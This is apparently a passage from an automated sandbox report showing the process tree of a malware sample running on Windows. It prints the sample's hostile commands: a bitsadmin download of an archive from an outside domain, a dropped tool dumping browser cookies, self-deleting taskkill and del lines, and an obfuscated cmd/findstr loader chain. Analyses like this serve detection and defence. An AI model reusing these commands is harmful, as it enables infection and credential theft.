                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff9f3914f50,0x7ff9f3914f60,0x7ff9f3914f70
                                                                                                9⤵
                                                                                                  PID:640
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1720 /prefetch:2
                                                                                                  9⤵
                                                                                                    PID:4920
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2200 /prefetch:8
                                                                                                    9⤵
                                                                                                      PID:4196
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1768 /prefetch:8
                                                                                                      9⤵
                                                                                                        PID:6100
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2600 /prefetch:1
                                                                                                        9⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4904
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:1
                                                                                                        9⤵
                                                                                                          PID:5452
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                                                                                                          9⤵
                                                                                                            PID:5004
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                                                                                                            9⤵
                                                                                                              PID:6052
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
                                                                                                              9⤵
                                                                                                                PID:4332
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
                                                                                                                9⤵
                                                                                                                  PID:5484
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 /prefetch:8
                                                                                                                  9⤵
                                                                                                                    PID:5020
                                                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                                    9⤵
                                                                                                                      PID:812
                                                                                                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6276fa890,0x7ff6276fa8a0,0x7ff6276fa8b0
                                                                                                                        10⤵
                                                                                                                          PID:5716
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 /prefetch:8
                                                                                                                        9⤵
                                                                                                                          PID:3380
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3732 /prefetch:8
                                                                                                                          9⤵
                                                                                                                            PID:1792
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3724 /prefetch:8
                                                                                                                            9⤵
                                                                                                                              PID:5788
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1708,1471325722127431050,12125123219440557301,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5508 /prefetch:2
                                                                                                                              9⤵
                                                                                                                                PID:5464
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "cmd.exe" /C taskkill /F /PID 4712 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\6kOW_LZdnd9w2n3wFGzccS70.exe"
                                                                                                                              8⤵
                                                                                                                                PID:5500
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /F /PID 4712
                                                                                                                                  9⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:4484
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "cmd.exe" /C taskkill /F /PID 4712 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\6kOW_LZdnd9w2n3wFGzccS70.exe"
                                                                                                                                8⤵
                                                                                                                                  PID:5104
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /F /PID 4712
                                                                                                                                    9⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:4220
                                                                                                                            • C:\Users\Admin\Documents\pJ_2zBlkdeAyR8qLvjQakAWK.exe
                                                                                                                              "C:\Users\Admin\Documents\pJ_2zBlkdeAyR8qLvjQakAWK.exe"
                                                                                                                              6⤵
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:2324
                                                                                                                              • C:\Users\Admin\Documents\pJ_2zBlkdeAyR8qLvjQakAWK.exe
                                                                                                                                "C:\Users\Admin\Documents\pJ_2zBlkdeAyR8qLvjQakAWK.exe"
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:4860
                                                                                                                            • C:\Users\Admin\Documents\8vqDJiYB2TKYX0xa8EJnI8z0.exe
                                                                                                                              "C:\Users\Admin\Documents\8vqDJiYB2TKYX0xa8EJnI8z0.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4776
                                                                                                                            • C:\Users\Admin\Documents\HCwfK7IJdmS9DbgXr5UTsBoJ.exe
                                                                                                                              "C:\Users\Admin\Documents\HCwfK7IJdmS9DbgXr5UTsBoJ.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks processor information in registry
                                                                                                                              PID:3956
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im HCwfK7IJdmS9DbgXr5UTsBoJ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\HCwfK7IJdmS9DbgXr5UTsBoJ.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                7⤵
                                                                                                                                  PID:5152
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /im HCwfK7IJdmS9DbgXr5UTsBoJ.exe /f
                                                                                                                                    8⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:5356
                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                    timeout /t 6
                                                                                                                                    8⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:4324
                                                                                                                              • C:\Users\Admin\Documents\jcuost_WwW0uCvUD548qZoBX.exe
                                                                                                                                "C:\Users\Admin\Documents\jcuost_WwW0uCvUD548qZoBX.exe"
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4708
                                                                                                                                • C:\Users\Admin\Documents\jcuost_WwW0uCvUD548qZoBX.exe
                                                                                                                                  "C:\Users\Admin\Documents\jcuost_WwW0uCvUD548qZoBX.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:5160
                                                                                                                                • C:\Users\Admin\Documents\4e7KOlfyYqAIgzLePjvAZIh8.exe
                                                                                                                                  "C:\Users\Admin\Documents\4e7KOlfyYqAIgzLePjvAZIh8.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  PID:4772
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdCB71.tmp\tempfile.ps1"
                                                                                                                                    7⤵
                                                                                                                                      PID:4680
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdCB71.tmp\tempfile.ps1"
                                                                                                                                      7⤵
                                                                                                                                        PID:5556
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdCB71.tmp\tempfile.ps1"
                                                                                                                                        7⤵
                                                                                                                                          PID:3380
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdCB71.tmp\tempfile.ps1"
                                                                                                                                          7⤵
                                                                                                                                            PID:5064
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdCB71.tmp\tempfile.ps1"
                                                                                                                                            7⤵
                                                                                                                                              PID:1560
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdCB71.tmp\tempfile.ps1"
                                                                                                                                              7⤵
                                                                                                                                                PID:3472
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdCB71.tmp\tempfile.ps1"
                                                                                                                                                7⤵
                                                                                                                                                  PID:4812
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5360
                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                  "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                                                  7⤵
                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                  PID:4608
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:3312
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_6.exe
                                                                                                                                              sonia_6.exe
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Adds Run key to start application
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:1624
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3724
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5116
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                6⤵
                                                                                                                                                  PID:5908
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  6⤵
                                                                                                                                                    PID:3516
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                4⤵
                                                                                                                                                  PID:4032
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 532
                                                                                                                                                  4⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:3612
                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:2996
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                              2⤵
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              • Modifies registry class
                                                                                                                                              PID:2608
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                              2⤵
                                                                                                                                                PID:4292
                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 4292 -s 504
                                                                                                                                                  3⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  • Program crash
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:4536
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                2⤵
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:4492
                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                              1⤵
                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:2572
                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                2⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:3980
                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                              1⤵
                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                              PID:5512
                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                2⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:4404
                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                              1⤵
                                                                                                                                                PID:2872
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3782.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3782.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:6124
                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                    cmd /c start c.exe & start l.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5332
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4680
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c.exe
                                                                                                                                                          c.exe
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5368
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Parlasse.wmv
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5284
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2572
                                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                      findstr /V /R "^hqVLSBiFVkisDvgANWfHkkgqnFPqUPdvHQlUgqiIGEuNwqJAbhcZzXvwMVhhLiKuVLKNjzkNOHwGyBYbVfCGzdrKzoozMTXmTqRddWgreIkLVQWlWPacEtMEHZxtk$" Ove.wmv
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:4972
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                        Puramente.exe.com m
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:2156
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:5428
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:5760
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:4332
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:5764
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:6064
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                12⤵
                                                                                                                                                                                                  PID:5364
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                      PID:5144
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                          PID:4268
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                              PID:5808
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                  PID:5924
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                      PID:5408
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                                          PID:5904
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                            19⤵
                                                                                                                                                                                                                              PID:2980
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                                20⤵
                                                                                                                                                                                                                                  PID:4688
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                                                      PID:5952
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                          PID:5556
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                                            23⤵
                                                                                                                                                                                                                                              PID:6132
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                                                24⤵
                                                                                                                                                                                                                                                  PID:812
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                                                    25⤵
                                                                                                                                                                                                                                                      PID:636
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                          PID:5744
                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                  ping GFBFPSXA -n 30
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                  PID:4384
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\l.exe
                                                                                                                                                                                                            l.exe
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:5356
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3A71.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3A71.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5176
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 3A71.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3A71.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4892
                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
